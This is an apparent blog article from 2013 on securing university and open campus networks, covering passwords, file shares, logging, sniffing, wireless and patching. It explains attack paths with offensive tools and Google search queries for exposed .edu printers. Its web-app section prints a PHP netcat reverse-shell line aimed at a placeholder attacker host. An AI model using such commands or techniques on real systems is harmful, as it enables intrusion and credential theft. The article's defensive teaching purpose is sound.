A Logo

Feel free to include my content in your page via my
RSS feed

Help Irongeek.com pay for
bandwidth and research equipment:

Search Irongeek.com:

Affiliates:
ISDPodcast Button
RootSecure Button
Social-engineer-training Button
Irongeek Button

Web Hosting:
Dreamhost Logo
Help Irongeek.com pay for bandwidth and research equipment:

paypalpixle




Information Security in University Campus and Open Environments 2013

Information Security in University Campus and Open Environments 2013

Adrian Duane Crenshaw


        A few years back I wrote an article on information/network/computer security from the stand point of a University campus. It's been about 8 years, some things have changed (though much has stayed the same) and my experience has grown so I figured that it was time for an update. Also, since I no longer work for a university I can be more open about what I say. :) This article is not very detailed, the scope of the topic is just too large, but I'll try to give you a brain dump of concepts to keep in mind and point you to other articles and tools that can help you out.

        Much of an information security professional's job involves keeping outsiders away from the internal network. A great deal of time and money is spent on firewalls and Intrusion Detection Systems to protect server and client machines from threats coming from the Internet, limiting some attack vectors to only computers on the LAN. Physical security is also taken into consideration, with access cards and locked doors used to keep unwanted visitors off of the local network and to limit physical proximity to the infrastructure. This is all fine and good for corporate environments, but what about open environments like libraries and university campuses? When an organization's purpose is the dissemination of knowledge, the paradigm (don't you just love that word) of information security shifts tremendously and one cannot be sure that all users on the LAN are completely benevolent. This article will be geared towards techs at universities, libraries and other open environments and will attempt to address common security problems that may pop up at these institutions. I'll gear the solutions towards Open Source, freeware, and base operating system security options in a Windows XP/7 (if you are using 8, why?) and Linux environment to keep the information useful to the largest number of people. Not all of us have the budget to buy site licenses for software or other products to protect our patron workstations. Too many articles recommend expensive solutions when there are plenty of free or cheap solutions available. Links to most of the software mentioned as well as sites for further research can be found throughout this article.

A word about terminology

        I'll generally use the term patron to refer to students, faculty, staff and general visitors except where a more specific term is needed. Also, I will use the term attacker or deviant user instead of "hacker" or "cracker" because the later terms have so many different meanings depending on who you talk to (a hacker is a wood cutter and a cracker is some white dude from Georgia). Some folks like the terms White Hat Hacker and Grey Hat Hacker, but those are still too flexible, and sometimes sound silly (I prefer to consider myself a Plaid Hat Hacker). University administrators (the suit kind, not the tech kind) do not really grasp these terms. For example, one of the justifications that was used to take away my personal campus website once was:

"Additionally, Mr. Crenshaw's personal website, housed on university resources, is a compendium of links to know computer hacker websites, hacker toolkits, and other hacker resources."

        So that I am not later accused of plagiarism, that particular quote comes from Dr. Larry Mand after a website I created embarrassed him (it gets way more complicated). He was a comp-sci professor, a vice chancellor, and a smiling idiot, but unfortunately this sort of attitude is not limited to him. Amongst university administrators, I imagine it might be common. Just because someone has a doctorate does not mean they are qualified for the position they are put in.

A different kind of environment

        Institutions like Universities are different from the corporate world. You can't physically lock the patrons out of every computer at your facility. The entire mission of a university or library is to give patrons the tools and information they need to learn and the faculty what they need to teach. At the same time a system administrator has to protect staff and patron workstations from deviant users on the network. Every information security professional worries about internal attacks, but this worry is greatly amplified in a campus or open environment where so many users have physical access to the computers and the network.

        One thing to consider is the power of the users, and by this I mean political power. Students don't really have power beyond "give me what I want or I will take my tuition dollars elsewhere", but that little bit of power may work in the aggregate to get them the technical resources they want. Staff may have power depending on their department, who they work for and what ears they can bend. Where power really comes into play a tenured faculty and administrators. Faculty or administrators can put force on something to get it moved through, even if they have no idea of the security ramifications. As examples. these would not be uncommon dictates/demands:

1. What do you mean I can't be an admin on my own machine? (Doctorate does not equal: "Knows not to click on something stupid")
2. You can put this software on every computer on campus by next week right? It worked fine on my home system. (Testing goes by the wayside)
3. This business app has to run as an administrator. (No, it probably does not, but as with #2 above, in limited time it might be the only expedient option)
4. Faculty given a static IP and settings to assign to a box, confuses their host IP with the gateway address and enters the gateway address as the host address. (Network hilarity ensues, and I have heard of one incident of this were the professor was told of the problem, but because he was tenured he refused to change his setting and made the IT department change their network configuration instead)

        Sadly, I don't have a solution to the issues above, other than making sure the Information Technology department has the political clout to say no. Ideally, the Information Security department should be outside of the Information Technology department for reasons of avoiding political pressure (Example: Hey, can you fudge this security audit to make us look better? I am your boss after all.).

        Another interesting oddity of universities is network inertia and IP space. Many corporations present a few IPs to the Internet, and all of the clients are NATed off. Many universities got in on the IP address space land rush early, so they have enough publically accessible IPs that they can, and do, assign them to workstations, printer and other network gear. Granted, for some types of experimentation you need the public IPs, but not for simple things like email, web surfing and watching YouTube. This makes things more difficult to secure as users don't even have to worm their way into a NATed off network first, then attack the inside. Reverse DNS also makes this interesting, as if it is not configured correctly an attacker can get a good idea of who the user of a given workstation/IP is based on its hostname (acrenshaw-lb104.someuniversity.edu gives away a lot if information).

        So how do we hold back the hordes when the barbarians are already past the gates? In this article I hope to point out some of the common security problems with campus environments and some of the solutions. Many problems may not be solvable because the solution would be counter to the mission of your organization, but with a watchful eye many troubles can be averted. Don't underestimate the power of user awareness training as well, though don't over estimate it either (I believe cynicism is next to Godliness, and I'm an agnostic).

Local Security on Windows Boxes

        It's an old computer security axiom that if an attacker has physical access to a computer, then it is no longer your computer. Barring things like full hard drive encryption, an attacker has complete access to the software and data on a computer if they have unrestricted physical access. Some naive student desktop deplorers may think they are safe because they use NTFS. Hey, I can assign different users different levels of permission to the files, so it's not like the old Windows 9x days and Fat32. The issue is, all the permissions someone sets under the installed OS on the hard drive count for squat if a user brings their own boot device. There are handy boot CDs/USB drives that people can used to either just run the apps they want, or to modify the local drive and get admin access to install them. I used to recommend "Offline NT Password & Registry Editor, Bootdisk / CD" (http://pogostick.net/~pnh/ntpasswd/) for offline password changes and Bart's PE Builder (http://www.nu2.nu/pebuilder/) if you wanted to to run some Windows apps and edit items on an NTFS drive or in the Windows registry. Things have come a long way since then, modern Linux Live CD distros now have good NTFS support, and there are safer ways to reset local passwords. Nowadays I'd look into using Windbuilder (http://reboot.pro/) to make a live CD/USB that lets you boot a cut-down version of Windows, and if you want to reset a local account password (or safer yet create a new admin level account) Sala's Password Renew (http://www.sala.pri.ee/) can be used. Sala's Password Renew may not work on some of the more up-to-date versions of Windows, so also check out NTPWEdit (http://cdslow.webhost.ru/en/ntpwedit/).  Bare in mind that using an offline password reset tool may cause problems with some apps. For example, if someone stores passwords in an app (commonly the web browser), then someone uses an offline password changer on the Windows local login, the password saved in the app may fail to work as it was encrypted with the hash of the previous Windows login password. For that matter, tools like Kon-Boot (http://www.piotrbania.com/all/kon-boot/) can be used from a CD/DVD/USB drive and chain boot to the OS on the local hard drive, but circumvent the authentication process so all local passwords are blank for that boot (rebooting should make authentication go back to normal). I have tutorials on using Windbuilder and making live DVDs/CDs/UFDs at the following URLs:

Portable Boot Devices (USB/CD/DVD)
http://www.irongeek.com/i.php?page=videos/portable-boot-devices-usb-cd-dvd

Building a boot USB, DVD or CD based on Windows 7 with WinBuilder and Win7PE SE Tutorial
http://www.irongeek.com/i.php?page=security/winbuilder-win7pe-se-tutorial

Dual booting Winbuilder/Win7PE SE and Backtrack 5 on a USB flash drive with XBOOT
http://www.irongeek.com/i.php?page=videos/xboot-backtrack-winbuilder-dual-boot

        Now some reader may be thinking: "Those are just the patron access machines - my staff workstations and file servers are still safe because they are behind locked doors." Let me share my little horror story about network privilege escalation:

        First frat boy Bob becomes a local admin on a workstation using a boot device. He then copies off the SAM and SYSTEM files for later cracking with Cain (http://www.oxid.it/cain.html) or better yet Hashcat (http://hashcat.net). I've done tons of videos/articles over the years on password cracking, so I'll point you to some of those:

Cracking Windows Vista/XP/2000/NT Passwords via SAM and SYSKEY with Cain, Ophcrack, Saminside, BKhive, Samdump2 etc
http://www.irongeek.com/i.php?page=security/cracking-windows-vista-xp-2000-nt-passwords-via-sam-and-syskey-with-cain-ophcrack-saminside-bkhive-etc 

Password Exploitation Class
http://www.irongeek.com/i.php?page=videos/password-exploitation-class

        Many folks use the same local admin passwords on all of the boxes they deploy, allowing Bob to attack other boxes from across the network using the cracked credentials. Bob then installs a software key logger to gain even more credentials as faculty, staff and students login to the compromised workstation. Metasploit's (http://www.metasploit.com/) psexec function using the Meterpreter payload would work great for this as then the attacker can keylog, sniff, dump local hashes and do other fun things. Later on, one of the support staff with admin privileges to the file servers and most of the workstations on campus logs in to do some work and in the process has his user name and password saved for later retrieval by Bob. Now Bob has access to most of the boxes on the network. Yippy!

        The above assumes the attacker is bothering to crack the password, but they may not even need to do that. In some cases the hash can be extracted from the SAM/SYSTEM files and then used to directly authenticate using the pass the hash attack (http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Pass-The-Hash_Toolkit). Having the same local administrator passwords on all of the boxes on the network is not sounding so good now, is it?

        How does one fight against this problem? As stated before, NTFS use to be cited as an answer, but it is not much of a solution as any Linux/Windows PE based boot device can be used to copy off, edit or add files to the system. The first thing I'd recommend is not to have the same local administrator password on all the machines. Use different passwords for different departments, or better yet scrabble the local admin password and rely on domain credentials for doing the administrative work (granted, this is not always practical). I'm personally thinking of implementing something that sets the local administrator password to a hash of the machines MAC address concatenated with a secret key (HASH(MAC+SK)), but I'm sure there a other schemes so that the local passwords and hashes are not the same on all the boxes while still allowing for their recovery if needed. Changing all of the local passwords remotely on a frequent basis is also an option, but just be careful how you do it as not all methods are secure (See http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences for an example of an insecure way to reset local admin passwords that is quite insecure).

        Putting passwords on the BIOS and setting it to only boot from the hard drive can help, but if you are going to do that you have to go all the way and physically lock the case. Otherwise the attacker can just open up the case and pull the battery or reset the right jumper to get in. Generally the physical locking of the stations causes as many problems for the support staff that have to image the systems (using Ghost or a similar tool) as it causes for the attacker, but if you don't plan to nuke and rebuild the machine often then locking the case can be a very good idea (especially if it is in an unsupervised area where people are unlikely to notice someone opening the case and mucking around). To keep attackers from easily cracking your SAM files you can disable the storage of LM hashes (http://support.microsoft.com/default.aspx?scid=KB;EN-US;q299656&) though if you are using Windows Vista or newer LM hashes should be disabled by default. More modern NTLM can still be cracked, but it's not nearly as easy. Watch the "Password Exploitation Class" video above for a full explanation, but the core of it is that LM hashes are essentially two 7 character passwords in all upper case, making them MUCH easier to crack. Another thing to keep in mind is that if you use a password longer than fourteen characters no LM hash will be stored for it. NT hashes can also be cracked of course, but LM hashes are much more vulnerable because they are single case and broken into two easily cracked seven byte chunks. Up to date anti-virus software and regular scans for common key loggers is another good idea (though custom written malware is unlikely to be detected). Also setting up regular password expirations can help to mitigate the effects of key loggers and password cracking, but this does not seem like an easy policy to enforce at a university as faulty and staff hate to be told that they have to change their password (an aforementioned admin had the same one for something like 10 years). Frequent password resets also causes patrons to write the passwords down, so it's a bit of a catch 22. Post-It-Notes on monitors, in desk draws and under keyboards are always good places to look for passwords

Simple Local and Domain Passwords

        How many times have you seen someone use a dictionary word as a local Administrator password? If an attacker can gain administrator account access on a workstation using a boot disk, or just copy off the SAM and SYSTEM files from the hard disk, it can be trivial to crack dictionary passwords using the tools mentioned before, even if LM hash storage is turned off. I use to recommend Samdump2 and John the Ripper (http://www.openwall.com/john/) to crack Windows password, but there are easier and faster tools now. Cain can extract the SYSKEY from the SYSTEM registry hive and use that to extract the password hashes from the SAM file and crack them. If you really want to speed up the cracking process, look into the aforementioned Hashcat, especially if you can use your video card to accelerate the process.

        Now that is just the local passwords on a Windows box, but what about Domain credentials? By default Windows will store a hash for the last 10 domain users locally so that if the box can not connect to a Domain Controller to authenticate the users it can use these local cached hashes as a fall back. These cached hashes are much tougher to break than an LM or NTLM hash, but there are tools to do it. Both Cain and Hashcat have this functionality, though with Hashcat you will have to extract the MSCache cached credentials with a another tool first. .

Remote Password and Default Password

        An attacker may attempt to bruteforce a password remotely by just throwing password after password at the login prompt. Attackers can use tools like THC-Hydra (http://www.thc.org/thc-hydra/), Medusa (http://www.foofus.net/~jmk/medusa/medusa.html) or the old as hell Brutus (http://www.hoobie.net/brutus/) from across the network to try to crack accounts, but this much slower than a local attack. I don't personally do remote brute forcing of passwords. It's loud (assuming anyone is reading the logs, more on that in a bit), slow and prone to error.

        One trick I have used a lot in pen-tests is to check for default passwords. So many pieces of equipment have a default (or no) password on them, and people will just plug them into the network and leave them in their default state. Because so many universities put everything out on the public facing Internet and let port 80/443 through, these pieces of equipment can often be found even by people outside of the local area network. Here are some great examples you can find on the Internet via Google hacking:

Ricoh Savins
    intitle:"web image monitor" site:edu
    "/web/user/en/websys/webArch/mainFrame.cgi" site:edu
    inurl:"/en/sts_index.cgi" site:edu
HP Jetdirects (Varies greatly from model to model)
    inurl:hp/device/this.LCDispatcher
CUPS Connected Printers
   
inurl:":631/printers" -php -demo site:edu   

        The above are just printers, many likely to be open to the world with no password. Doing an Nmap for port 80 or 443 will likely turn up plenty of results, some of them being web servers on embedded equipment. Since some multifunction printer also store documents, sensitive information can sometimes be extracted this way (I once found a Social Security Number on a time sheet pulled from the data store of a printer). It's also popular for users to bring in a home storage NAS and hook it up. Other searches can find webcams and networking equipments. Webcams may give information about the facility (can I read that post-it note on your monitor with the password?). All equipment that has a network config page can be a Denial of Service (DoS) issue. What if someone remotes in and edits the TCP/IP setting to make a printer be the Gateway for the network? Not happy times. You should have a policy in place that requires passwords to be set to something other than the default as soon as a piece of gear is attached to the network. While on the subject of printers, it still shocks me that more students don't try to get around print restrictions (number of copies per semester) by just direct IP printing. Embedded devices are also interesting as the may store credentials for other network resources, including Domain creds. Deral Heiland created Praeda (http://www.foofus.net/?page_id=218) to look for just these sorts of vulnerabilities.

        Ensure that password policies do not allow easy-to-guess passwords and that someone is watching the event logs for signs of a brute force attack. Forced password changes for the support staff may be a good idea in some cases, but frequent password changes will cause some staff to write their password down and leave it where someone malicious could find it (the aforementioned post-it note on the monitor is popular). Also avoid using Social Security Numbers as default passwords. I don't think this is done as much as it used to be, but I figured I'd mention it anyway. Social Security information goes across too many desks at a university to be considered secure. Even work-study students may have access to databases of Social Security Numbers, and such information regularly makes it to recycle containers unshredded. The same thing goes for other personal information that's easy to find or guess. Rather than make complexity rules that make passwords so hard to remember that users write them down, go with passphrases where length is what matters (insert "That's What She Said" joke here). This comic strip explains it well:

XKCD on Password Strength

Shared Account Passwords

        I've worked in environments where system administration authority is centralized and the central management won't give enough of the support staff at regional facilities the access rights they need to do their jobs. This may be done in the name of security so fewer people will have the elevated privileges, but it can have a negative effect on the overall security of the organization. If support staff members need certain rights to do their jobs they should be given them, otherwise it leads to password sharing and the use of single accounts that have many users. This can cause major problems for accountability, attribution and damage control. Let's say Kevin has rights to add new machines into the domain, but his staff does not. The central administration does not want to give anyone else the needed rights but Kevin. For Kevin and his staff to get their jobs done Kevin must give his password to his staff members, but what if someone decides to do something "deviant" with the account? The responsible party would be harder to trace because so many staff members have access to the account. Another example is when a support staff member is given the local Administrator passwords to workstations instead of being put into a Domain security group. If that employee is later terminated it's much harder to contain the damage they can do because even if they are taken out of the support staff security groups they still know other staff's passwords and the local Administrator passwords. It's very important to implement a password change policy for when staff leave the organization.

Password Reuse

        This one is a bear. So many people reuse the same password for everything so it's easier to remember. This can come back to bite them if the password at one location is compromised. It's one thing if someone gets into your university account and deletes your term paper, it's another if they use the same password to get into your bank. The university may be using a single sign on system with good security features, but what about all those social networks you are on? Or that forum you sign onto that is not using SSL/TLS? Granted, remembering many passwords is hard. My recommendation as a compromise is to use a few different passwords for different classes of data: One for financial stuff, one for social networks, one for work, one for school, etc. I know writing down passwords is given a bad rap, but written down and stored someplace private like your wallet or purse is better than using the same one everywhere. Better yet, look into using a password vault  like KeePass (http://keepass.info/) and keep it on your thumb drive as well as backed up elsewhere (there are versions for smart phones too). On a related subject, be aware of what information you put out on social network sites and how it ties to your passwords (or password reset questions if your system uses them). The George Bronk case is a great example of someone scraping through Facebook profiles to find potentials passwords (birthdates, pet's names, etc.) to use against accounts. In George's case, the goal was to get nude pics of girls from their private photos. An example where public information and password reset questions came into play is the Sarah Palin Yahoo Email "hack". The questions for resetting her password were simple things like "Where did you meet your husband?" or the like, information that is easily obtainable in the case of a high profile person. If you want more information on profiling people, check out:

OSInt, Cyberstalking, Footprinting and Recon: Getting to know you
http://www.irongeek.com/i.php?page=videos/osint-cyberstalking-footprinting-recon

Turn off File Sharing and Unneeded Services

        Using a host based firewall like the one built in to all versions of Windows since XP SP2 can be a good idea, but better yet is not to have possibly vulnerable services running in the first place. Turning off file sharing on computers that do not need it is a must. Many types of attacks can be averted if an attacker does not have access to administrative shares. Those faculty and staff who must use file and printer sharing should be taught how to set proper share permissions. By default, Windows 2000 use to give the Everyone group full read and write access to shares, Windows XP  and 7 gives just Read to the Everyone group in the default config screen. Many folks don't know any better and just take the defaults.

        To give an example of how bad this can be, let's assume a secretary in one of the offices wants to share a database of student names, Social Security Numbers, and addresses with others in the office. Ideally, this sort of data should not be on a local machine, but often is. She simply right clicks on the folder she wants to share and takes all of the defaults. Now one of the students is poking around on the network to see what computers are out there and what shares they can get into. They could just be curious, or they could be looking for other students that have shared out their MP3 and movie collections. They may just browse around using the modern equivalent of Network Neighborhood (Just the Network icon now), or use an automated tool like SoftPerfect's NetScan (http://www.softperfect.com/products/networkscanner/) to find all of the network shares available to them in a certain IP range. While looking around the student comes across a share called "Student Database"; two guesses what kind of information is in it. Scan your own network for open file shares before someone else does. Besides NetScan there's also ShareEnum (http://technet.microsoft.com/en-us/sysinternals/bb897442.aspx) which can scan for shares by Domain/Workgroup or IP range and report what permissions different groups have to the shares. NetScan happens to be my current tool of choice, but I have an outdated article on "Finding Rogue SMB File Shares On Your Network" (http://ww.irongeek.com/i.php?page=security/roguefileshares) that might be useful to you.

        Disabling unneeded services like Personal Web Server, SNMP, Simple TCP/IP Services and others can also go a long way to cutting down on potential exploits and information harvesting. Even a system that is behind on service packs and hot fixes can't be easily exploited if the vulnerable services aren't there to begin with (well, I guess even that has exceptions when you consider Social Engineering and client side exploits). Turn off anything that is not used and pay attention to what is being installed on the network.

Unread Logs

        Watch the web and security event logs. There are many times where I would not have noticed attackers on the network if it were not for looking in Event Viewer for failed login attempts. Of course logging must be turned on for this to work so open up MMC (Microsoft Management Console), add Security Configuration and Analysis, and setup logging of failed logins and access attempts. Better yet, set up a GPO (Group Policy Object) to automatically configure security auditing when a machine logs on to the network.

        If an IDS (Intrusion Detection System) is running at the facility make sure someone is looking at the logs. An IDS like Snort (http://www.snort.org/) is useless if no one actually looks at what is reported. If you have the cash, look into a SIEM (Security Information and Event Management) system like ArcSight or similar tools to make parsing and looking for interesting events easier. I hear good things about Splunk (http://www.splunk.com/) for log aggregation. There are also some Open Source log management systems, but I have not played with them enough to make recommendations:

Graylog2
http://graylog2.org/

OSSIM
http://sourceforge.net/projects/os-sim/

If you want o play with a bunch of IDS tools in one place then check Doug Burks Security Onion project

Security Onion
http://securityonion.blogspot.com/

It's about the quickest way I know to get an IDS up an running.

Web Apps

        This section is old and in need of expanding and updating. It's been awhile since I ran a personal website from university resources. Most universities give students and staff the ability to create their own web pages on a campus web server. Sometimes the users can even create server side scripts (PHP, Perl, ASP, whatever) for their websites to make them more dynamic. The thing is, some of these scripts can have unintended effects, especially if you have bad file permissions on the server and do not limit the functions students can use. Listing all "dangerous" functions in these programming languages would be a huge effort, instead I will point you to OWASP's cheat sheets where you can find details on server and scripting language hardening:
https://www.owasp.org/index.php/Category:Cheatsheets

        To give you an example, with PHP installed and configured insecurely on a Windows server a user could run an arbitrary program in their web folder, for example Netcat, with a command like this:

                    $x = shell_exec("nc AttackingBoxIP 30 -e cmd ");

        The previous command shovels a shell back to the attacker, allowing them command line access to the web server and from there they could leap frog to other machines and have their identity obscured as that of the web server. Active Server Pages have similar functionality (Wscript.shell). Using methods similar to these, a user could view the source code of another script (possibly revealing database passwords), or if the web server's file system has loose permissions, they could edit other web pages or system files. The same thing goes for Apache/*nix web servers with overly broad permissions (chmod 666 is the mark of the beast when it comes to insecure file permissions). To help limit these risks always use proper file permissions and limit what a user can script (see http://www.php.net for information on using the safe_mode directive in PHP, see Microsoft Knowledgebase article Q278319 for limiting the use of Wscript.shell in Active Server Pages). For newer versions of ASP, like ASP.NET, I've not really touched them enough to give you a strong set of recommendations. Check with OWASP to see if there have a guide for hardening your development environment.

        In the above section I was mostly addressing what students might do, but that's not to say they are the only ones that may fuck up. I used to know of a student directory web app where someone could dump all the names with a simple search using % as the only parameter (SQL Wildcard).

If you want more general web app security information and guidance, definitely check out OWASP's guides:

OWASP (Open Web Application Security Project )
https://www.owasp.org

and a ton of videos Jeremy Druin and I have been involved with:

Web Application Pen-testing Tutorials With Mutillidae
http://www.irongeek.com/i.php?page=videos/web-application-pen-testing-tutorials-with-mutillidae

OWASP Top 5 and Mutillidae: Intro to common web vulnerabilities like Cross Site Scripting (XSS), SQL/Command Injection Flaws, Malicious File Execution/RFI, Insecure Direct Object Reference and Cross Site Request Forgery (CSRF/XSRF)
http://www.irongeek.com/i.php?page=videos/owasp-top-5-louisville

Insecure Protocols and Sniffing

        When possible, insecure protocols that pass credentials in plain text across the network should not be used. Common examples of such insecure protocols are FTP, telnet, POP3, SMTP, and HTTP. In their place use encrypted protocols like SFTP, SSH (Secure Shell), and HTTPS when possible. Protocols like FTP may be hard to switch away from because the clients and servers for more secure protocols like SFTP are not necessarily build into the common Operating Systems patrons will be using. FTP clients come with every recent version of Windows (ftp.exe from the command line and Explorer from a GUI), but free clients that support SFTP, like FileZilla (http://filezilla-project.org/) and PSFTP (http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html), can be downloaded.

        Even with a switched network it's not hard for an attacker on the same subnet/VLAN to use Ettercap (http://ettercap.sourceforge.net/) or Dsniff (http://monkey.org/~dugsong/dsniff/) from a BackTrack boot DVD/UFD (http://www.backtrack-linux.org/) to do some ARP Poisoning (also called ARP spoofing sometimes) and redirect traffic through their host for the purpose of sniffing. These tools can even parse out user names and passwords automatically, making the attacker's job easy. If the attacker ARP Poisons between the gateway and the FTP server he can sniff the traffic and extract user names and passwords as users are trying to get their data from offsite, and the same thing goes for SMTP and POP3. Even with SFTP, SSL, and SSH, passwords can still be sniffed with Ettercap because it has the ability to proxy those types of connections. Cain can do much the same sort of MITM (Man In The Middle) trick on older version of RDP (Remote Desktop Protocol). The user might get a warning that the public key of the server they are trying to get to has changed or may not be valid, but how many users just click past those kinds of messages without actually reading them? I have several specific pages on these sub-topics of network sniffing:

Network Sniffers Class for the Kentuckiana ISSA 2011
http://www.irongeek.com/i.php?page=videos/network-sniffers-class

Basics of Arpspoofing and getting around a switch
http://www.irongeek.com/i.php?page=security/arpspoof 

        Since an attacker has to be on the same subnet/VLAN/wireless network as the box he is ARP Poisoning it's a good idea to split the staff and public networks into at least two subnets (and possibly put a firewall between them). If you wish to be on the look out for potential sniffers on your network there are a few tools that can help (though hopefully your IDS is set up in such a way that it can alert you). ARPWatch (http://en.wikipedia.org/wiki/Arpwatch) will log MAC address to IP mappings and can alert system administrators to changes that may signify that someone is ARP Poisoning the network. Older tools like Sentinel and Sniffdet can be used to ferret out hosts that have their network card in promiscuous mode (accepting all traffic the NIC can see, not just broadcasts and traffic destined for its MAC address), but these are pretty out of date. I'd recommend trying out Ettercaps sniffer detection plugin, which I cover in this video:

Finding Promiscuous Sniffers and ARP Poisoners on your Network with Ettercap
http://www.irongeek.com/i.php?page=videos/finding-promiscuous-and-arp-poisoning-sniffers-on-your-network-with-ettercap

        There are also tools to help set up and manage static ARP tables, but this can be difficult to manage of done on too many hosts:

ARPFreeze: A tool for Windows to protect against ARP poisoning by setting up static ARP entries
http://www.irongeek.com/i.php?page=security/arpfreeze-static-arp-poisoning

        I'll cover more on WiFi evil twin and rogue access point problems later in this article.

Trashing

        Be careful what you throw away. Make sure printouts with patron information are disposed of properly. A good cross cut paper shredder should do the trick, but if you're very paranoid you may want to look into incineration. Make sure all disk based media is also destroyed or wiped properly. Just deleting the contents of a disk is not enough; and neither if formatting if you don't do it right. Tools like PhotoRec (http://www.cgsecurity.org/wiki/PhotoRec) can be used to search byte for byte down storage media, hard drives and flash media for deleted files based on their header/footer. There are several effective methods for destroying digital data before trashing old media. Windows has gotten better over time with this. In Vista and newer versions of Windows un-checking the "quick format" option helps because it will then 0 out the bytes on the drive. Things worked differently in the XP days. Media like diskettes and CDs/DVDs can be broken apart, or shredders can be bought that are especially designed to do the job. Granted, if you want to get picky, there are still ways to get back some of the data from shredded media, but they are cost prohibitive. The most cost effective means is to take a pair of tough shears and cut the diskette or CD into bits, but make sure goggles are worn to protect the wearers eyes from flying shards. Hard drives and flash media can be wiped with tools like Dban (http://www.dban.org/) which securely overwrites data on the hard drive so that even magnetic force microscopy techniques will not likely recover any of the data. One issue with Dban is that it will not get the bad block lists, so if your BIOS does not lock you out of it you may want to look into a tool that uses the ATAs spec's Enhanced Secure Erase options (http://cmrr.ucsd.edu/people/Hughes/SecureErase.shtml). I know some say one wipe is not enough, but here is the counter to that: http://computer-forensics.sans.org/blog/2009/01/15/overwriting-hard-drive-data/

        If your organization does not plan to donate the hardware after they are finished with it they can obtain a large hard drive degausser to permanently scramble the disks. Just keep in mind that the drive will be unusable after it is degaussed. The above is really just the tip of the iceberg when it comes to digital data destruction (Anti-Forensics), more details can be found in these videos:

Anti-Forensics Filler - Irongeek
http://www.irongeek.com/i.php?page=videos/bsidescleveland2012/anti-forensics-irongeek

Anti-Forensics: Occult Computing Class
http://www.irongeek.com/i.php?page=videos/anti-forensics-occult-computing

Network Awareness: Know what's out there

        Patching is very important, but you have to know what's running on your network before you can patch it. Open Source tools like Nmap (http://nmap.org/) and Nagios (http://www.nagios.org/) can be used to find out what kinds of Operating Systems and services are running on your network. WMI scripts and Microsoft Baseline Security Analyzer (http://www.microsoft.com/en-us/download/details.aspx?id=7558) can be used to find out what service packs and hot fixes a Windows box has applied. If you find a box that is not getting patched for some reason, or is beyond it's support lifecycle, dig around and find out why and then get it off the network. If you want to go more in-depth, look into scanning your network with purpose build vulnerability scanners like Nessus (http://www.tenable.com/) or Nexpose (http://www.rapid7.com). There are free community versions of both, though I don't think the licensing allows free use for "higher education" institutions. Some might be surprised how many machines on their network are running outdated, exploit-vulnerable Operating Systems and software. Once you know what Operating Systems and services are out there go patch them.

        While on this subject, look into how your revere DNS works. If you are using publically accessible IP space for your workstations, do you really want someone to do a reverse DNS lookup on your whole IP space and look at the host names to figure out what person uses what host based on their username being part of the machine name? Nmap with the -sL option is great for finding this information.

Patch, Patch, Patch

        If you are reading this article this will come as a big duh. While making sure that unneeded services are disabled limits the scope of potential exploits, patching is still important. Things have gotten a lot better than it used to be with automatic updates/patching (not that automating the process doesn't sometimes cause problems of its own). I remember back in the summer of 2003 running around patching a bunch of boxes by hand because of  MS03-039, just a little bit before the Blaster Worm made its rounds. Know what systems are on the network and patch them in a timely manner. If most of your workstations are Windows based look into setting up a WSUS (http://technet.microsoft.com/en-us/windowsserver/bb332157.aspx) at your facility and push out updates automatically using a GPO (Group Policy Object). For Linux boxes make sure that you choose a distribution that has an easy way to update packages as security vulnerabilities are found. I personally like Debian/Ubuntu based systems since most of the time all that is needed is a quick "apt-get update;apt-get dist-upgrade" command to update all of the installed packages. Most distributions will have and update application of some kind so check the vendor's website for information on applying updates. For third party applications that are not covered by the update tools built into the OS go to the trouble of having someone at your facility sign up with the vendors mailing list so that they are notified when a new version of the software is released. This is especially true for Open Source web apps, but also client side plug-ins like Flash, Acrobat and others. Drive by malware that gets install by clients web surfing to malicious sites with out-of -ate browsers and plug-ins is a major headache for the helpdesk personnel that have to clean up the aftermath.

A Word on Wireless

        Most educational facilities in this day and age will offer WiF (802.11 A, B, G, N, AC or whatever the current spec is by the time you read this) wireless connectivity all over the campus, which raises quite a few new issues. This topic should be in an article onto itself, but I'll mention a few major points here.

        BYOD (Bing You Own Device) is a big buzz word now in IT, but universities have faced this problem pretty much from the start. Since you can't control what patrons have on their laptops, and other wireless devices, it's harder to keep certain kinds of malware off of the network. A worm that's blocked by your Internet facing firewall may have no problem spreading from an infected laptop that a patron brings onto the wireless network. A good practice is to have the wireless side of the network well filtered by a firewalled from the wired side.

        Assuming you offer completely open WiFi access, keep in mind that all of the traffic can be sniffed. This may not be an issue to you, but it's something patrons should be aware of. Most of the information provided in the "Insecure Protocols and Sniffing" section of this article applies to WiFi as well. One problem you may see at universities is legacy equipment, which may not support better wireless encryption protocols. This may tempt some to have special WAPS just for these legacy systems to use, but really this will lead to more troubles. WEP (Wired Equivalent Privacy) is long in the tooth and broke as hell at this point. Cracking WEP has been dumbed down to the point where anyone can do it, Fern-WiFi-Cracker being a good example of a tool that automates the process (http://code.google.com/p/fern-wifi-cracker/). WEP is nearly useless in open environments like a campus since anyone with the key can read the data sent from other wireless stations. WPA PSK (Wi-Fi Protected Access Pre-Shared Key) can be used to encrypt data sent on the wireless network but is ungainly to set up on computers your facility does not control (your patrons laptops and other wireless devices). Also, with local access the PSKs can be extracted with tools like WirelessKeyView (http://www.nirsoft.net/utils/wireless_key.html). Pre-Shared Key systems also do not allow for individual user authentication if your organization wants to know who did what when and where. WPA and WPA2 with a PSK (pre-shared key) are nice in that even with every user using the same PSK they can't directly sniff each others network traffic because of TKIP (Temporal Key Integrity Protocol). Well, there is an exception to that, others' WPA/WPA2 traffic can be sniffed if you can connect to the network and ARP poison between the clients/access points. Like WEP, WPA1/2 using a PSK does not allow for individual user authentication so there is still the attribution problem. Luckily, versions of WPA can also be made to work with a 802.1X authentication server (WPA-Enterprise), but that may be a harder solution to implement for some than a simple VPN. Back when WEP was the only thing out there, the easiest solution in many cases was just set up a user authenticated VPN (Virtual Private Network) and have users connect to if after first connecting to the open WiFi. Not sure that is optimal, as sometimes other box on the open WiFi may be inadvertently set up as gateways. By the way, even if you are using a version of WPA, make sure you turn off WPS support if it is there. WPS makes thing easier for home setup, but it is also pretty crackable (http://code.google.com/p/reaver-wps/).

